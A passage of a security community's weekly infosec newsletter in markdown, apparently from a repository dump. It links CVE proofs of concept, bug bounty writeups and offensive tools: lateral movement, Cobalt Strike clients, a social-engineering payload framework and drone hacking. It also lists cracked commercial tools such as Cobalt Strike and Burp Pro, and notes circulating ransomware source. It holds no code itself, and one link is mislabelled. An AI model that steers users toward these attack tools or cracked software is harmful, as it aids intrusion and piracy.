\n3. Blue/Red/Purple Team, IR and Threat intelligence - 4 Tools \n\n - [WMEye](https://github.com/pwn1sher/WMEye)\n > A post exploitation tool that uses WMI Event Filter and MSBuild Execution for lateral movement. \n - [Headless Strike](https://github.com/CodeXTF2/cobaltstrike-headless)\n > It is a Aggressorscript that turns the headless aggressor client into a (mostly) functional cobalt strike client. \n - [Varc - Volatile Artifact Collector](https://github.com/cado-security/varc) \n > varc collects a snapshot of volatile data from a system. It tells you what is happening on a system, and is of particular use when investigating a security incident.\n - [exploits-predict](https://github.com/wisoffe/exploits-predict) \n > Predicting the probability of an exploit being released after a CVE is published (by Machine learning algorithm) and this project is based on [Cookiecutter data science project template.](https://drivendata.github.io/cookiecutter-data-science/)\n\n
\n\n
\n4. Reverse Engineering, Encryption & OSINT - 7 Tools \n\n - Jetstack Paranoia: [A New Open Source Tool for Container Image Security](https://www.jetstack.io/blog/announcing-paranoia/)\n - Hashview: [A web front-end for password cracking and analytics.](https://github.com/hashview/hashview)\n - [NoRunPI: Run Your Payload Without Running Your Payload](https://github.com/ORCx41/NoRunPI)\n - [SteaLinG v0.3](https://github.com/De3vil/SteaLinG)\n > The SteaLinG is an open-source penetration testing framework designed for social engineering After the hack, you can upload it to the victim's device and run it.\n - A simple [shell script (almost) POSIX for mail security checks](https://github.com/jeffbencteux/mailsecchk)\n - [PE-bear](https://github.com/hasherezade/pe-bear) is a multiplatform reversing tool for PE files. \n > It's objective is to deliver fast and flexible “first view” for malware analysts, stable and capable to handle malformed PE files.\n - OSINT-Bookmarklets: [Fast Search including Dark Web Search. ](https://github.com/C3n7ral051nt4g3ncy/OSINT-Bookmarklets) \n\n
\n\n
\n5. IoT, OS & Hardware - 4 \n \n - [Open Athena](https://github.com/mkrupczak3/OpenAthena) \n > It is a project which allows consumer and professional drones to spot precise locations through their images. This is accomplished by combining their [sensor metadata](https://github.com/mkrupczak3/OpenAthena/blob/main/drone_sensor_data_blurb.md) with an [offline-ready Digital Elevation Model](https://github.com/mkrupczak3/OpenAthena/blob/main/EIO_fetch_geotiff_example.md) to provide the instant location of what is being observed\n\n - [CiLocks](https://github.com/tegal1337/CiLocks) -> Crack Interface lockscreen, Metasploit and More Android/IOS Hacking.\n - [Cotopaxi](https://github.com/Samsung/cotopaxi) \n > Set of tools for security testing of Internet of Things devices using specific network IoT protocols.\n - [HKSSY/Drone-Hacking-Tool](https://github.com/HKSSY/Drone-Hacking-Tool) \n > Drone Hacking Tool is a GUI tool that works with a USB Wifi adapter and HackRF One for hacking drones.\n\n
\n
\n\n---\n \n
\n 🤝🤝🤝 Team/Contributor and Community Engagement patners and resources that help drafting Weekly Infosec Update.🤝🤝🤝 \n\n> Huge thanks to our awesome [Community Leader for contribution and giving back to community](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/SupportedBy/Team%26Contributors.md) and thankyou for being the part of team.\n - Contributors : Good Resources Share, Paul miller, Tarang Parmar, Tuhin Bose, Vikram and Alexandre ZANNI.\n\n> I'm very grateful to all the [Organization, group, and community that support us for the engagement](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/SupportedBy/CommunityEngagementPartners.md). Without their support distributing \"Weekly InfoSec Update\" among hackers would not have been possible.\n\n> Resources from [Organization and researchers](https://github.com/RESETHACKER-COMMUNITY/Community-Contributers/blob/main/StayUptoDate.md) that help us drafting [Weekly infosec Update](https://github.com/RESETHACKER-COMMUNITY/Community-Contributers/blob/main/StayUptoDate./md).\n\n
\n \n ---\n\n#### Wrapping Up\n

\n \n
\nHave questions, Suggestions, feedback or want to contribute? Just reply directly to mail (resethackeroffical@gmail.com), I'd love to hear from you.\n\nIf you find this update useful and know other people who would too, I'd really appreciate if you'd forward it to them ?? Thanks for reading!\n \n \n

\"Pentesting-Bugbounty//ResetCybersecuirty/\"

\n" }, { "path": "ResetCybersecuirty/Weekly_Infosec_Update(WIU)/Weekly_Infosec_Update_12.md", "content": "#### Hey Hackers, I hope you have all enjoyed your Weekend!! \n\n > Here are the agenda for Weekly infosec Update v0.7 : 26th October- 1st November 2022\n\n \n![](https://img.shields.io/github/forks/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)\n![](https://img.shields.io/github/stars/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)\n![](https://img.shields.io/github/last-commit/RESETHACKER-COMMUNITY/Pentesting-Bugbounty) \n\nThe best ways to SAVE TIME & read this newsletter?\n\n- Select the topic from the Navbar bellow and click on Summary/Preview and Arrow (>) to see the Details:\n\n- Open all relevant titles in a New Tab (Ctrl+Click) and read each one by one.\n\n[![cve poc](https://img.shields.io/badge/-CVE-%232C4C9C?style=for-the-badge&logo=github&logoColor=black)](#title-cve) [![research & Business](https://img.shields.io/badge/-Research-%232C4C9C?style=for-the-badge&logo=github&logoColor=black)](#title-research) [![beginners](https://img.shields.io/badge/-News-%232C4C9C?style=for-the-badge&logo=github&logoColor=black)](#title-beginners) [![bug bounty](https://img.shields.io/badge/-Bug%20Bounty-%232C4C9C?style=for-the-badge&logo=github&logoColor=black)](#title-bb) [![tools](https://img.shields.io/badge/-Tools-%232C4C9C?style=for-the-badge&logo=github&logoColor=black)](#title-tools) \n\n![WIU_Trail_Pro](https://user-images.githubusercontent.com/25515871/191970244-14b8821b-acd9-4fb6-8e9b-f627392c4715.png)\n\n---\n\n\n\n### 🪲🪲🪲 CVE : poc exploit and cve analysis 🪲🪲🪲\n\n### Week -> [**26th October- 1st November 2022**](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/CVE's/Readme.md)👈.\n\n \n\nSecurity patched within a week: \n\n > We have tracked the latest Security Advisories from top vendors and filtered out high and critical vulnerabilities that have been patched. Morzilla, Microsoft, Jenkins, Github, Cisco, Linux (Ubuntu 22.4,20.4 & 18.4 LTE) & CISA advisories are available this week.\n\n\n\n\n\nCVE Analysis, writeups and reports: (A total of 6 CVE in this week)\n\n\n > This week, we have collected the recently discovered write-ups for cve that have critical or higher severity. \n\n\n\n \n\n Poc for CVE & exploit (A total of 12 newly discovered 0-days this week) :\n\n\n> Every week, we're tracking the most recent exploits and patches for CVE and exploit. \n\n\n\n
\n\nSummary/Preview\n\n > Week -> [**19th October- 25th October 2022**](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/CVE's/Readme.md) 👈.\n\n \n\n CVE:ANALYSIS & POC: CVE-2022-40684, Zimbra 0Day CVE 2022-41352 , CVE-2022-42889/ Text4Shell, CVE-2022-37969 \n\n CVE-2022-3236 & CVE-2022-36966. \n\n \n\n CVE POC (0-Day): 7-ZipPostExploit, CVE-2022-21970, CVE-2022-41040-metasploit-ProxyNotShell, CVE-2022-22947, Sploits, \n\n CVE-2022-42045, CVE-2022-36663, CVE-2022-3368, CVE-2022-27502, CVE-2022-23131, CVE-2021-46422(google crome).\n\n \n\n
\n\n---\n\n\n\n### 🔍🔍🔍 RESEARCH, SECURITY & IT ORGANIZATION 🔍🔍🔍\n\nThe goal of this segment is to collect the latest and most relevant articles/whitepapers/research/techniques/resources across all the infosec domains that will benefit independent researchers and professionals that need to stay current with latest security developments, look for a more innovative approach to find CVEs/bugs, track the infosec market and startups. \n\n
\n\n1 - Infosec Business, funded and Market \n\n \n - 1 - Infosec Business, funded and Market \n\n - [Top cybersecurity trends for 2023](https://www.spiceworks.com/it-security/cyber-risk-management/guest-article/the-top-cybersecurity-trends/) \n\nIn Taylor Hersom's talk he mentioned multiple reports such as Q1 2022 resulted from cyberattacks, Persistent Phishing, The Digital Supply Chain Problem, The Cybersecurity Mesh and Distributed Approach.\n\n - What Does It Mean To [‘Invest In Cybersecurity’ In 2022 And Beyond?](https://www.forbes.com/sites/theyec/2022/10/19/what-does-it-mean-to-invest-in-cybersecurity-in-2022-and-beyond/?sh=571ea1b51eb5)\n\n - [A comparison of cybersecurity regulations](https://law.asia/comparison-cybersecurity-regulations/)\n\n - Gartner Survey Finds [88% of Boards of Directors View Cybersecurity as a Business Risk](https://www.gartner.com/en/newsroom/press-releases/2022-10-19-gartner-says-89-percent-of-board-directors-say-digital-is-embedded-in-all-business-growth-strategies)\n\n \n\n - Infosec Market Helpdesk \n\n\n - The Cybersecurity Market Size is Expected to Hit US$266.2 Billion by 2027, reflecting a constant-currency compound annual growth rate of 11% from 2021.\n\n - The global cybersecurity workforce gap has increased by 26.2% compared to 2021, with 3.4 million more workers needed to secure assets effectively, according the [(ISC)2 2022 Cybersecurity Workforce Study](https://www.isc2.org//-/media/ISC2/Research/2022-WorkForce-Study/ISC2-Cybersecurity-Workforce-Study.ashx)\n\n > This represents a stark increase in the shortage of cybersecurity professionals compared to 2021, which stood at 2.72 million. The research surveyed 11,779 individuals responsible for cybersecurity.\n\n - [Report from ReportLinker](https://www.reportlinker.com/p06352700/Global-Artificial-Intelligence-In-Cybersecurity-Market-Size-Share-Industry-Trends-Analysis-Report-By-Offering-By-Vertical-By-Application-By-Type-By-Technology-By-Regional-Outlook-and-Forecast-.html) \n\n > The Global Artificial Intelligence In Cybersecurity Market size is expected to reach $57.1 billion by 2028, rising at a market growth of 24.5% CAGR during the forecast period\n\n\n - This research share the insight of [Indian Market, client and help you understand who is right client for your business](https://drive.google.com/file/d/1yRuIGqb5gcWN_F_tgqHgZA7RuLr34sIS/view?usp=sharing) \n\n - Investers and Venture capital(VC) for cybersecurity STARTUP : [100x.vc : To get investment in india](https://www.100x.vc/), [Liberty City Ventures](https://www.libertycityventures.com/), [Evolution Equity](https://evolutionequity.com/), [M12VC](https://m12.vc/), [Team8.VC](https://team8.vc/), [Centerstone Capital](https://www.centerstone.capital/), [Insight partners](https://www.insightpartners.com/), [World Trade Venture](http://worldtradeventures.com/), [Menara Venture](https://menaraventures.com/) etc.\n\n \n\n
\n\n \n\n
\n\n 2. Research/Article discussed by professionals or independent researchers \n\n \n\n - 1 - Web Security and android security\n\n \n\n - [Analysis of thousands of active API tokens leaked via public package repositories](https://jfrog.com/blog/jas-secrets-detection-reveals-active-tokens/)\n\n - [Bringing Modern Authentication APIs (FIDO2 WebAuthn, Passkeys) to Linux Desktop](https://github.com/AlfioEmanueleFresta/xdg-credentials-portal)\n\n - [HTTP/3 connection contamination: an upcoming threat](https://portswigger.net/research/http-3-connection-contamination)\n\n - RPC Toolkit - [security research oriented resources on MS-RPC (articles, PoCs, vulnerability write-ups, tools, etc.)](https://github.com/akamai/akamai-security-research/tree/main/rpc_toolkit)\n\n - postMessage Braindump - [a brief postMessage testing methodology](https://rhynorater.github.io/postMessage-Braindump)\n\n - [Userland Execution of Binaries Directly from Python](https://www.anvilsecure.com/blog/userland-execution-of-binaries-directly-from-python.html)\n\n - In a nutshell: [data protection, privacy and cybersecurity in India](https://www.lexology.com/library/detail.aspx?g=b06b310c-76d0-4625-8b21-b0dba79bdf52)\n\n - SANS released a survey [Think Like a Hacker: Inside the Minds and Methods of Modern Adversaries | September 2022](https://drive.google.com/file/d/1LiandSv7-TNGpzY5IsUzPNDReDVTiJgl/view?usp=sharing)\n\n - 2 - Cloud Security & Automation\n\n - [Kubernetes CRD validation with CEL and kubebuilder marker comments](https://blog.rewanthtammana.com/kubernetes-crd-validation-with-cel-and-kubebuilder-marker-comments)\n\n - [How an Attacker Can Achieve Persistence in Google Cloud Platform (GCP) with Cloud Shell](https://securityintelligence.com/posts/attacker-achieve-persistence-google-cloud-platform-cloud-shell/)\n\n - [October : Google Cloud Latest news & Update](https://cloud.google.com/blog/topics/inside-google-cloud/whats-new-google-cloud)\n\n \n\n - 3 - Blue/Red/Purple/Threat Intelligence Team\n\n - Blue Team \n\n - [Verizon 2022 Data Breach Investigations Report (DBIR)](https://www.verizon.com/business/resources/reports/dbir/2022/master-guide/)\n\n - [How to Investigate Insider Threats (Forensic Methodology)](https://www.inversecos.com/2022/10/how-to-investigate-insider-threats.html) \n\n - [How a Microsoft blunder opened millions of PCs to potent malware attacks](https://arstechnica.com/information-technology/2022/10/how-a-microsoft-blunder-opened-millions-of-pcs-to-potent-malware-attacks/)\n\n - [Microsoft Defender adds command and control traffic detection](https://www.bleepingcomputer.com/news/microsoft/microsoft-defender-adds-command-and-control-traffic-detection/)\n\n - [Microsoft Office 365 Message Encryption Insecure Mode of Operation](https://labs.withsecure.com/advisories/microsoft-office-365-message-encryption-insecure-mode-of-operation)\n\n- [#StopRansomware: Daixin Team](https://www.cisa.gov/uscert/ncas/alerts/aa22-294a)\n\n\n - Red Team\n\n - [Nighthawk 0.2.1 – Haunting Blue](https://www.mdsec.co.uk/2022/11/nighthawk-0-2-1-haunting-blue/)\n \n - [Scripts to detect canery Tokens](https://www.reddit.com/r/redteamsec/comments/yi8sqk/scripts_to_detect_canary_tokens)\n \n - [Environment configuration for Red Team Cyber Security testings and tasks](https://github.com/zackjmccann/red-team-security)\n\n - [One shell to HANDLE them all](https://kotaku.com/genshin-impact-fanart-ai-generated-stolen-twitch-1849655704)\n\n - [Hidden DNS resolvers and how to compromise a fully-patched WordPress instance](https://sec-consult.com/blog/detail/melting-the-dns-iceberg-taking-over-your-infrastructure-kaminsky-style/)\n\n\n - 4. HelpDesk\n\n - [Pentesting HelpDesk](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/PentestingReports/Readme.md) By Resethacker Community.\n \n - [API security checklist](https://github.com/shieldfy/API-Security-Checklist)\n\n \n\n
\n\n---\n\n\n\n### Friendly Segment\n\n > We have tried to solve the problem \"How to stay upto date with the latest Bug Bounty Community without wasting time on social media\" and this segment is for Intermediate bug hunters and ethical hackers where NEWS and segmentsment are common for professional and intermediate.\n\n
\n 📰📰📰 Hackers NEWS 📰📰📰 \n \n > Based on hacker demands, we have reorganized infosec news into 5 different segments.👇\n\n \n\n
\n\n 1. Top 3 infosec News \n\n - [Elon musk after taking over the Twitter](https://www.tweaktown.com/news/business_financial_and_legal/index.html)\n\n - Dropbox discloses [breach after hacker stole 130 GitHub repositories.](https://www.bleepingcomputer.com/news/security/dropbox-discloses-breach-after-hacker-stole-130-github-repositories/)\n\n - Hacker steals Ed Sheeran's unreleased music, sells it to make nearly $150,000\n > BBC reports that Kwiatkowski managed to steal the unreleased music by hacking into the artist's cloud-based accounts, with Sheeran and Lil Uzi Vert only being some of the artists impacted by Kwiatkowski as authorities found 1,263 unreleased songs from 89 artists on his laptop during the seizure. Notably, the laptop also contained other incriminating evidence, such as documents that detailed how Kwiatkowski hacked into the victims' accounts, as well as the Bitcoin he admitted to receiving in return for distributing the unreleased songs. \n\n
\n\n \n\n
\n\n 2. Event recap \n\n \n\n Haxacon 2022, mWISE 2022 and BountyCon slides were hot topics this week in the community. We have gathered relevant Talks, Slides, Tools, Podcasts, Videos, and upcoming events related to conferences, talks & webinars for you to watch them, at your convenience.\n\n - Conferences\n\n - [Defcon30 2022 : videos](https://www.youtube.com/user/DEFCONConference/videosw) recommended and Filtered by InsiderPhD\n\n - Hacking doors / Access control system hacking\n - Silk – How to Lock Pick\n - BiC Village – Ochuan Marshall – The Last Log4J Talk You Ever Need\n - James Kettle – Browser-Powered Desync Attacks: A New Frontier in HTTP Request Smuggling\n - Daniel Jensen – Hunting Bugs in the Tropics\n - Orange Tsai – Let’s Dance in the Cache – Destabilizing Hash Table on Microsoft IIS\n - Michael Bargury – Low Code High Risk – Enterprise Donation via Low Code Abuse\n - Jeffrey Hofmann – PreAuth RCE Chains on an MDM – KACE SMA\n - DC30 DCGVR Talks – Careful Who You Colab With\n - Samuel Erb, Justin Gardner – Crossing the KASM – a Webapp Pentest Story\n - Thomas Roth , Solana – JIT – Lessons from fuzzing a smart contract compiler\n - Richard Thieme – UFOs, Alien Life, and the Least Untruthful Things I Can Say\n - stacksmashing – The Hitchhacker’s Guide to iPhone Lightning and JTAG Hacking\n - Retail Hacking Village – Spicy Wasabi – Rock The Cash Box\n\n\n\n - Webinars and videos\n - Saytronic : [Hackers are finally using Drones](https://www.youtube.com/watch?v=r6g7EH8dKRM)\n - HackTheBox - Faculty - [SQL Injection on Update Statements and Inject Shellcode with GDB!](https://www.youtube.com/watch?v=LGO-dn7668g)\n - Practical ctf - [Hacking into a law firm to delete al client case](https://youtu.be/Q5THt8IzXHw)\n - [Writing Ransomware for VMWare ESXi](https://youtu.be/dB0dOF1ood0)\n - Cybersecurity [public speaking techniques | Guest Lisa Tetrault](https://youtu.be/E6EfJyFjvDc) \n\n - Ongoing/Upcomming: \n\n - Registration : \n - For startups We have good news from 100x.vc. [100X Gurukul applications are open](gurukul.100x.vc) all at No Cost, No Equity, No Fee! \n - Google Cloud [Best of Next '22](https://cloudonair.withgoogle.com/events/apac-best-of-next22) | November 24, 2022 - November 25, 2022 | Virtual\n > Discover the latest product announcements, new ideas and supercharge your skills with insights from leading professionals and real world technology applications.\n - 100x.vc is back with [Founders dating](https://www.100x.vc/founders-dating) | 11th November Bengaluru\n\n - Events :\n - IT-SA : 25th to 27th October | Nuremberg, DE \n\n
\n\n \n\n
\n\n 3. Twitter Threads, News, Anouncement & Tips 🟢\n\n \n\n \n\n - Announcement 🟢 :\n\n - Black Reward, an [Iranian hacker group, claims to have breached the Iranian government and exfiltrated sensitive data related to their nuclear programs.](https://twitter.com/vxunderground/status/1583568821675126784)\n\n - Windows Terminal Now [Default in Windows 11](https://devblogs.microsoft.com/comman) and [Windows Terminal on GitHub](https://github.com/microsoft/terminal)\n\n \n\n - Threads, Resources, News & Tips 🟢 :\n\n \n - Jeroen van der Ham shared a thread where [@1sand0s, @ncsc_nl and @CyberSecTUDelft interviewed 22 organizations to find out how organizations filter and prioritize vulnerabilty information](https://twitter.com/1sand0s/status/1583379375797329922)\n\n - Froggy Trying to [build an Attack surface management Tool](https://twitter.com/iamthefrogy/status/1581768423649837056)\n \n\n
\n\n \n\n
\n\n 4. Update on Data breach & Blackhat hackers Leaked 👇🔴\n\n \n\n \n\n - 🔴 Update - Paid Tools that has been leaked or cracked by Black Hat Hackers : \n\n > Cobaltstrike 4.7.2 Licence, CANVAS 7.27, Invicti Standard 6.7.0.37625, Acunetix Version 15 build 15.0.221007170 for Windows and Linux – 13th October 2022, BurpSuite_pro_v2022_9.4, Nessus Core + tenableSC 20220307 ISO & Linux, Malcat malware analyzer, xray_1.9.1_windows_x64, WinLicense x32/x64 v3.1.3.0, bruteratel 1.2.2, and 010 Editor 13.0-beta2, cellebrite | UEFD.\n\n \n\n - 🔴 Update - Black Hat Hacker leaked & activity : 4\n\n - HIVE ransomware group has ransomed Tata Power, a multi-billion dollar electric utility company based in Mumbai, India.\n\n > Tata's confirmed the breach. Customers and sensitive data are effected, but core functionality is present and customers still have electricity.\n\n - Nuclear agency internal files leak\n\n > These 1.4 gb worth of files regarding the Nuclear power authority in Indonesia are being leaked in response to police brutality and corruption by the Indonesian government.\n\n - We have verified the Indian government and defence sector leak \n\n > Includes all kinds of top secret, secret and confidential documents from the following sectors, ALISDA, DGAQA, MSQAA, DRDO,DDP, Joint Defence Secretary India, BSF, MOD and the Indian Navy.\n\n - Conti source code for v3.7.7, Ransomeware builder tools has been circulated around private group and Taurus bot source code has been leaked. \n\n \n\n
\n\n \n\n
\n\n 5. Hiring/Jobs\n\n\n\nThe purpose of this segment is to talk about and share resources related to jobs in this month, interview questions, and free training offered by organizations, communities, and leaders.\n\n \n\n - 1. Take a Look at [Internship/Job Opening in October 2022](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/CyberSecurityJobs/Jobs.md#Weekly-Cybersecurity-Hiring-Aug-2022).\n\n - 2. Here ResetHacker have collected [Interview Questions asked by organization](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/CyberSecurityJobs/InterviewQA.md).\n\n - 3. [Cybersecurity Jobs HelpDesk](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/CyberSecurityJobs/Readme.md)\n\n \n\n
\n\n
\n\n\n\n
\n\n \n 🐞🐞🐞 BUG BOUNTY 🐞🐞🐞 \n\n > Everything related to Bugbounty : report, witeups and resources👇\n\n \n\n
\n\n 1. Hackerone/Bugcrowd reports are worth reading for Bug Hunters. : 4 Reports \n\n \n\n 1. In This Segment, We have filtered out Top *HACKERONE/BUGCROWD REPORT** for Bug Hunters :*\n\n - 🐞 $13,000 weakness : Authentication Bypass Using an Alternate Path or Channel on Stripe where the impact was [Mass Accounts Takeover Without any user Interaction at https://app.taxjar.com/](https://hackerone.com/reports/1685970)\n\n - 🐞 $2,000 weakness : Command Injection - Generic on Hyperledger where the impact was [POOL_UPGRADE request handler may allow an unauthenticated attacker to remotely execute code on every node in the network.](https://hackerone.com/reports/1705717)\n\n - 🐞 $1,000 weakness :Server-Side Request Forgery (SSRF) on Acronis where the impact was [mail.acronis.com is vulnerable to zero day vulnerability CVE-2022-41040](https://hackerone.com/reports/1719719)\n\n - 🐞 $1,000 weakness :SQL Injection on U.S. Dept Of Defense where the impact was [Unauthenticated SQL Injection at █████████ [HtUS]](https://hackerone.com/reports/1719719)\n\n
\n\n \n\n
\n\n2. BUG BOUNTY : writeups, tips & resources. \n\n \n\n 2. In This Beginners friendly segment, We collect and filter out *BUG BOUNTY WRITEUPS, TIPS & RESOURCES*** \n\n \n\n - Writeups : 11 :\n\n - A journey of [fuzzing Nvidia graphic driver leading to LPE exploitation](https://github.com/quarkslab/conf-presentations/blob/master/Hexacon-2022/hexacon_2022_a_journey_of_fuzzing_nvidia_graphic_driver.pdf)\n\n - Regulator: [A unique method of subdomain enumeration](https://cramppet.github.io/regulator/index.html)\n\n - Subdomain Enumeration [Tool Face-off 2022](https://blog.blacklanternsecurity.com/p/subdomain-enumeration-tool-face-off)\n\n - SSRF - [Case study of 124 bug bounty reports](https://t.me/resethacker/932) By Grzegorz Niedziela founder of Bug Bounty Reports Explained.\n\n - 23000$ for [Authentication Bypass & File Upload & Arbitrary File Overwrite](https://medium.com/@h4x0r_dz/23000-for-authentication-bypass-file-upload-arbitrary-file-overwrite-2578b730a5f8)\n\n - Google [SSO misconfiguration leading to Account Takeover](https://medium.com/@0x4kd/google-sso-misconfiguration-leading-to-account-takeover-cf9bcf63e76e)\n\n - Facebook [SMS Captcha Was Vulnerable to CSRF Attack](https://lokeshdlk77.medium.com/facebook-sms-captcha-was-vulnerable-to-csrf-attack-8db537b1e980)\n\n - [Appsmith Patches Full-Read SSRF Vulnerabilities Reported by CloudSEK](https://cloudsek.com/appsmith-patches-full-read-ssrf-vulnerabilities-reported-by-cloudsek/)\n\n - [Error based SQL Injection with WAF bypass manual Exploit 100%](https://c0nqr0r.medium.com/error-based-sql-injection-with-waf-bypass-manual-exploit-100-bab36b769005)\n\n - [Story about Escalation of HTML Injection to EC2 Instance credentials leak](https://medium.com/@Cybervenom/story-about-escalation-of-html-injection-to-ec2-instance-credentials-leak-e2cbd7343a83)\n\n - Firing 8 [Account Takeover Methods](https://0xmaruf.medium.com/firing-8-account-takeover-methods-77e892099050)\n\n \n\n - Recently Discovered Resources Found + Non-Technical : 4\n\n - [OSCP Exam Change | Offensive Security](https://www.offensive-security.com/offsec/oscp-exam-structure/)\n\n - [Cyber Security Career Pathways](https://blog.marcolancini.it/2022/blog-cyber-security-career-pathways/) \n\n > Marco lanchi shows his consern over organizations trying to sell their certifications and drafted a mindmap below is a first attempt at grouping roles into macro-functions commonly found in tech companies.\n\n - [Which part of the security community are you in?](https://www.philvenables.com/post/field-guide-to-the-various-communities-of-security)\n\n > Field Guide to the Various Communities of Security\n\n - [How to get Cyber Security Job at Google](https://pentestingguide.com/how-to-get-google-cyber-security-jobs/)\n\n > If you want to become a hacker, bug bounty hunter or cyber security analyst and your dream job is Google, Microsoft or Facebook then this article is really meant to help you.\n\n
\n\n \n\n
\n\n3. Bug Bounty HELPDESK by ResetHacker Community.\n\n
\n\n\n - [Bug Bounty FAQ](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/Bugbounty/bugbounty-FAQ.md)\n\n - [Bug bounty Setup & hacker daily utiliy](https://github.com/RESETHACKER-COMMUNITY/Resources/blob/main/setup/Readme.md) \n\n - [Bug Bounty Resources, recon methodology worldlist, mindmaps, checklists etc](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/tree/main/Bugbounty)\n\n \n\n
\n\n \n\n \n\n
\n\n \n 🛠️🛠️🛠️ NEW TOOLS FOUND 🛠️🛠️🛠️\n\n > List of tools that satisfy hacker needs in all domains.👇\n\n \n\nSeveral community members test the tools and we then filter out the most useful and demanding ones that are relevant to different hacker purposes.\n\n
\n\n1. SAST/DAST/IAST/RASP/Recon/Network/Web Pentesting - 5 Tools\n\n \n\n - Janus : [String obfuscation tool based off the CIA's Marble Framework](https://github.com/echtdefault/Janus)\n\n - vaf : [A fast, simple, and feature rich web fuzzer written in nim](https://github.com/d4rckh/vaf)\n\n > Features:▫️ Fast threading.▫️ HTTP header fuzzing,▫️ Proxying,▫️ your own feature And more...\n\n - [ext4Shell scanner for Burp Suite](https://github.com/silentsignal/burp-text4shell)\n\n - [Ghauri](https://github.com/r0oth3x49/ghauri)\n\n > An advanced cross-platform tool that automates the process of detecting and exploiting SQL injection security flaws.\n\n - [XSLeaker](https://github.com/Philesiv/XSLeaker)\n\n > XSLeaker is a tool that helps to find XS-Leaks (https://xsleaks.dev/) on websites. The tool compares resource values for that a leak technique is known (e.g. number of iframes) between different stat\n\n \n\n
\n\n \n\n
\n\n2. Cloud Security - 3 Tools \n\n \n\n - [CloudFox](https://github.com/BishopFox/cloudfox) -> Automating situational awareness for cloud penetration tests. \n\n - [cloudvelo](https://github.com/Velocidex/cloudvelo) -> An experimental Velociraptor implementation using cloud infrastructure.\n\n - [Cloudlist](https://github.com/projectdiscovery/cloudlist) -> A multi-cloud tool for getting Assets from Cloud Providers. \n\n > This is intended to be used by the blue team to augment Attack Surface Management efforts by maintaining a centralized list of assets across multiple clouds. This is accomplished with very simple configuration efforts.\n\n
\n\n
\n\n3. Blue/Red/Purple Team, IR and Threat intelligence - 4 Tools \n\n - [WMEye](https://github.com/pwn1sher/WMEye)\n\n > A post exploitation tool that uses WMI Event Filter and MSBuild Execution for lateral movement. \n\n - [Headless Strike](https://github.com/CodeXTF2/cobaltstrike-headless)\n\n > It is a Aggressorscript that turns the headless aggressor client into a (mostly) functional cobalt strike client. \n\n - [Varc - Volatile Artifact Collector](https://github.com/cado-security/varc) \n\n > varc collects a snapshot of volatile data from a system. It tells you what is happening on a system, and is of particular use when investigating a security incident.\n\n - [exploits-predict](https://github.com/wisoffe/exploits-predict) \n\n > Predicting the probability of an exploit being released after a CVE is published (by Machine learning algorithm) and this project is based on [Cookiecutter data science project template.](https://drivendata.github.io/cookiecutter-data-science/)\n\n
\n\n
\n\n4. Reverse Engineering, Encryption & OSINT - 7 Tools \n\n - Jetstack Paranoia: [A New Open Source Tool for Container Image Security](https://www.jetstack.io/blog/announcing-paranoia/)\n\n - Hashview: [A web front-end for password cracking and analytics.](https://github.com/hashview/hashview)\n\n - [NoRunPI: Run Your Payload Without Running Your Payload](https://github.com/ORCx41/NoRunPI)\n\n - [SteaLinG v0.3](https://github.com/De3vil/SteaLinG)\n\n > The SteaLinG is an open-source penetration testing framework designed for social engineering After the hack, you can upload it to the victim's device and run it.\n\n - A simple [shell script (almost) POSIX for mail security checks](https://github.com/jeffbencteux/mailsecchk)\n\n - [PE-bear](https://github.com/hasherezade/pe-bear) is a multiplatform reversing tool for PE files. \n\n > It's objective is to deliver fast and flexible “first view” for malware analysts, stable and capable to handle malformed PE files.\n\n - OSINT-Bookmarklets: [Fast Search including Dark Web Search. ](https://github.com/C3n7ral051nt4g3ncy/OSINT-Bookmarklets) \n\n
\n\n
\n\n5. IoT, OS & Hardware - 4 \n\n \n\n - [Open Athena](https://github.com/mkrupczak3/OpenAthena) \n\n > It is a project which allows consumer and professional drones to spot precise locations through their images. This is accomplished by combining their [sensor metadata](https://github.com/mkrupczak3/OpenAthena/blob/main/drone_sensor_data_blurb.md) with an [offline-ready Digital Elevation Model](https://github.com/mkrupczak3/OpenAthena/blob/main/EIO_fetch_geotiff_example.md) to provide the instant location of what is being observed\n\n - [CiLocks](https://github.com/tegal1337/CiLocks) -> Crack Interface lockscreen, Metasploit and More Android/IOS Hacking.\n\n - [Cotopaxi](https://github.com/Samsung/cotopaxi) \n\n > Set of tools for security testing of Internet of Things devices using specific network IoT protocols.\n\n - [HKSSY/Drone-Hacking-Tool](https://github.com/HKSSY/Drone-Hacking-Tool) \n\n > Drone Hacking Tool is a GUI tool that works with a USB Wifi adapter and HackRF One for hacking drones.\n\n
\n\n
\n\n---\n\n\n
\n\n 🤝🤝🤝 Team/Contributor and Community Engagemepartners and resources that help draft the Weekly Infosec Update.🤝🤝🤝 \n\n> Huge thanks to our awesome [Community Leader for contribution and giving back to community](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/SupportedBy/Team%26Contributors.md) and thankyou for being the part of team.\n\n - Contributors : Good Resources Share, Paul miller, Tarang Parmar, Tuhin Bose, Vikram and Alexandre ZANNI.\n\n> I'm very grateful to all the [Organization, group, and community that support us for the engagement](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/SupportedBy/CommunityEngagementPartners.md). Without their support distributing \"Weekly InfoSec Update\" among hackers would not have been possible.\n\n> Resources from [Organization and researchers](https://github.com/RESETHACKER-COMMUNITY/Community-Contributers/blob/main/StayUptoDate.md) that help us drafting [Weekly infosec Update](https://github.com/RESETHACKER-COMMUNITY/Community-Contributers/blob/main/StayUptoDate./md).\n\n
\n\n \n ---\n\n#### Wrapping Up\n\n

\n\n \n\n
